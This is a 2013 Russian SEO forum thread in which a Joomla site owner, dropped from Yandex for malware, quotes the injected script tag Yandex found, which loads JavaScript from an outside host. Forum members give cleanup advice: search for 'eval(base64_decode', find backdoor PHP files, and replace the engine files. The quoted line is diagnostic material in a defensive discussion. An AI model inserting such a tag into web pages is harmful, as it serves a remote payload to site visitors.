Вернуться   SEO форум - оптимизация и продвижение сайтов > Web разработки > Безопасность

Важная информация
Безопасность - Помощь в обнаружении и удалении вредоносного кода с сайта. Устранение последствий взлома. Все о веб безопасности.

Ответ
 
Опции темы Оценить тему Опции просмотра
Старый 25.01.2013, 04:58   #1
 
Аватар для Hohol36g
 
Сообщений: 17
FR (активность): 627

Доп. информация
Вопрос Автор темы Вредоносный код... яндекс полностью выкинул из индекса мой сайт

Здравствуйте ув. форумчане.
2 дня назад увидел, что яндекс полностью выкинул из индекса мой сайт.www.monti-sib.ru Начал разбираться и увидел, что под названием сайта в яндексе написано:"Сайт может угрожать безопасности вашего компьютера или мобильного устройства". Была проблема около 2х месяцев назад... было огромное количество кода типа (base64_decode. Но сейчас после проверки сайта такого кода не обнаружил. Обратился в службу поддержки, там написали следующее:

При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил вредоносный код следующего содержания:

</html>
}

<script src="http://feelthesame.changeip.name/rsize.js"></script>

Пожалуйста, проверьте Ваши файлы и удалите вредоносный код. При поиске источника заражения воспользуйтесь рекомендациями, описанными в статье http://help.yandex.ru/webmaster/?id=1116613

Итак вопрос: что за код? его функционал? как мне его обнаружить?
Спасибо тем, кто откликнулся на мою проблему
Hohol36g вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 25.01.2013, 07:40   #2
 
Аватар для siam_dub
 
Сообщений: 132
FR (активность): 1,461

Доп. информация
По умолчанию Древняя проблема

Откатите сайт - если есть бекапы.
Если нет, то найдите лишний код начинающийся с
Цитата:
eval(base64_decode
Будет масса заражённых файлов, их нужно будет все отчистить. Что делает именно ваш код надеюсь знаете чем расшифровать?
Потом прийдётся поискать файл который плодит его ( какой то лишний ), сменить пароли если не смотеже по логам найти как к вас поламали. ( вариант посмотреть в images и его подпапках лишний php файлик - скорее всего и будет запасным входом на случай смены пароля )

С другой стороны сайт стоит на Джумле - у джумла владельцев в большинстве случаев есть хобби забивать на апдейты и защиту от иньекций Тут больше нужно знать что стоит у вас, если уверены, что не за брутфорсили админку.
siam_dub вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 25.01.2013, 19:53   #3
 
Аватар для Hohol36g
 
Сообщений: 17
FR (активность): 627

Доп. информация
По умолчанию Автор темы

Цитата:
Сообщение от siam_dub Посмотреть сообщение
Откатите сайт - если есть бекапы.
Если нет, то найдите лишний код начинающийся с
Будет масса заражённых файлов, их нужно будет все отчистить. Что делает именно ваш код надеюсь знаете чем расшифровать?
Потом прийдётся поискать файл который плодит его ( какой то лишний ), сменить пароли если не смотеже по логам найти как к вас поламали. ( вариант посмотреть в images и его подпапках лишний php файлик - скорее всего и будет запасным входом на случай смены пароля )

С другой стороны сайт стоит на Джумле - у джумла владельцев в большинстве случаев есть хобби забивать на апдейты и защиту от иньекций Тут больше нужно знать что стоит у вас, если уверены, что не за брутфорсили админку.
бекапов к сожалению нет. как проверить этот код я знаю. пару месяцев назад был точно такой же код, но там я так и не смог его удалить (точнее удалял, но либо сайт работать некорректно начинал, либо на следуюющий день появлялся вновь в тех местах, где я вчера его удалял). В общем с нуля сделал сайт и перезалил. Но проблема в том, что я знаю в "сайтостроении" только азы...и ничего больше... Ладно, буду гуглить что делать дальше.
Hohol36g вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 25.01.2013, 23:55   #4
 
Аватар для upgreyt
 
Сообщений: 434
FR (активность): 16,968

Доп. информация
По умолчанию

Цитата:
Сообщение от Hohol36g Посмотреть сообщение
бекапов к сожалению нет. как проверить этот код я знаю. пару месяцев назад был точно такой же код, но там я так и не смог его удалить (точнее удалял, но либо сайт работать некорректно начинал, либо на следуюющий день появлялся вновь в тех местах, где я вчера его удалял). В общем с нуля сделал сайт и перезалил. Но проблема в том, что я знаю в "сайтостроении" только азы...и ничего больше... Ладно, буду гуглить что делать дальше.
Варианты, откуда появился код, такие быть могут:

1. Дырявый двиг
2. Стырили пароли от вашего сайта
3. Дырявый хостинг

Обратите внимание на этот скрипт: http://revisium.com/ai/ , а так же на услугу разработчиков данного скрипта : http://www.revisium.com/ru/order/
upgreyt вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 26.01.2013, 10:11   #5
 
Аватар для Jogusto
 
Сообщений: 10
FR (активность): 50

Доп. информация
По умолчанию

Смотри по времени изменения файлов.

Скачай сайт на локалку и ковыряй там.

Или отключи пхп на сервере, поменяй пароли и не включай пока не найдёшь.

А лцчше воспользуйся услугами понимающих в этом. Так как сам ты может быть что то почистишь, но скорее всего не всё. И через некоторое время всё повторится.
Jogusto вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 27.01.2013, 11:34   #6
 
Аватар для urbano1983
 
Сообщений: 3
FR (активность): 59

Доп. информация
По умолчанию

ftp выключить
urbano1983 вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
"Плохо" от:
Umka (27.01.2013)
Старый 27.01.2013, 13:00   #7
 
Аватар для Umka
 
Сообщений: 4,143
FR (активность): 80,659

Доп. информация
По умолчанию

Цитата:
Сообщение от urbano1983 Посмотреть сообщение
ftp выключить
Конгениально, Ватсон!
А чего только фтп выключить? Не надо себя ограничивать: лучше вообще выключить весь сайт целиком. Нет сайта - нет проблемы.
-------

Сайт на Джумле..
Зараза как была, так и осталась.
Во-первых забэкапить и выгрузить себе на локал, на компе быстрее будет.
Затем избавиться от стыренного неведомо где шаба (joomlashine.com/joomla-templates.html).
Полностью заменить все файлы движка, т.е. взять чистую джумлу последнего релиза и просто залить поверх с заменой всех файлов - это быстрее, чем проверять все подряд.
И затем уже искать код (выше почти все написали).
Umka вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Ответ

Метки
вредоносный код

Быстрый ответ
Ваше имя пользователя: Регистрация. Для входа нажмите здесь
Случайный вопрос

Сообщение:
Опции
Внимание!
Этой теме более 3401 дней. Вы можете оставить сообщение здесь. Но, обращаем внимание. Возможно, рациональней создать новую тему (найти свежее обсуждение)?


Опции темы
Опции просмотра Оценка этой теме
Оценка этой теме:

Ваши права в разделе
Вы не можете создавать новые темы
Вы можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Сайт вылетел из индекса. Яндекс gordienkoff Индексация сайта 9 12.02.2013 09:04
[ Вопрос ] Яндекс выкинул страницы из индекса Alexandr S Индексация сайта 18 09.12.2012 23:49
За что Яндекс выкинул из индекса lilitclub Индексация сайта 14 03.02.2011 23:39
Google выкинул новый сайт иэ индекса. Andriucha Мусорка 0 06.05.2010 15:25
сайт вылетел из индекса яндекс! Wishmaster Яndex 6 24.08.2009 12:07

Текущее время: 23:42. Часовой пояс GMT +3.